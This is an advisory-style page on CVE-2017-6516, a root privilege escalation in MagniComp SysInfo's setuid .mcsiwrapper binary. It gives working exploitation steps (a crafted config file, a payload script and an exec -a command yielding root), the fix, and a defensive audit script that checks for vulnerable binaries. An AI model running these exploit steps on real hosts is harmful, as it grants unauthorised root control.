CVE-2017-6516 is a privilege escalation vulnerability in the .mcsiwrapper binary from MagniComp SysInfo in versions before 10-H64. When this binary has the SUID bit set and is outdated, a user may execute arbitrary code as the owner of the binary, which is often root.
- The binary .mcsiwrapper must be setuid:
  $ ls -l .mcsiwrapper
  -rwsr-xr-x 1 root root .mcsiwrapper
- The binary .mcsiwrapper must be older than version 10-H64:
  $ .mcsiwrapper --version
  <Version under 10-H64>
Create a file config with the following contents:
ExecPath=<Path to a writeable directory>
Create a payload executable file in the ExecPath directory, for instance:
#!/bin/sh
whoami
And make it executable:
$ chmod +x payload
Run the command:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Update .mcsiwrapper to at least 10-H64.
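To check a host for the two preconditions listed above (SUID bit set, version older than 10-H64), the following audit script can be used. It is an added example, not part of the original page or of SysInfo; the function names are hypothetical, and it assumes versions have the "<major>-H<build>" form and that --version prints a string containing that token.

```sh
#!/bin/sh
# Added audit example. Assumption: versions look like "<major>-H<build>",
# the form this page uses for the fixed release 10-H64.

# version_is_vulnerable VERSION
# Returns 0 if VERSION is older than 10-H64, 1 if not, 2 if unparseable.
version_is_vulnerable() {
    case "$1" in *-H*) ;; *) return 2 ;; esac
    major=${1%%-H*}
    build=${1#*-H}
    case "$major" in ''|*[!0-9]*) return 2 ;; esac
    case "$build" in ''|*[!0-9]*) return 2 ;; esac
    if [ "$major" -lt 10 ]; then return 0; fi
    if [ "$major" -eq 10 ] && [ "$build" -lt 64 ]; then return 0; fi
    return 1
}

# classify FILE VERSION
# Prints "vulnerable" only when both preconditions from the page hold:
# FILE has the SUID bit set and VERSION is older than 10-H64.
classify() {
    if [ ! -u "$1" ]; then echo "not-affected"; return 0; fi
    rc=0
    version_is_vulnerable "$2" || rc=$?
    case "$rc" in
        0) echo "vulnerable" ;;
        1) echo "not-affected" ;;
        *) echo "unknown" ;;   # SUID set, version not recognised: check by hand
    esac
}

# Usage: sh audit.sh /path/to/.mcsiwrapper ...
# Assumption: --version output contains the version token somewhere.
for f in "$@"; do
    ver=$("$f" --version 2>/dev/null | grep -Eo '[0-9]+-H[0-9]+' | head -n 1)
    printf '%s\t%s\t%s\n' "$f" "${ver:-?}" "$(classify "$f" "$ver")"
done
```

A result of "unknown" means the SUID bit is set but the version string could not be parsed, so the binary should be treated as suspect until its version is confirmed.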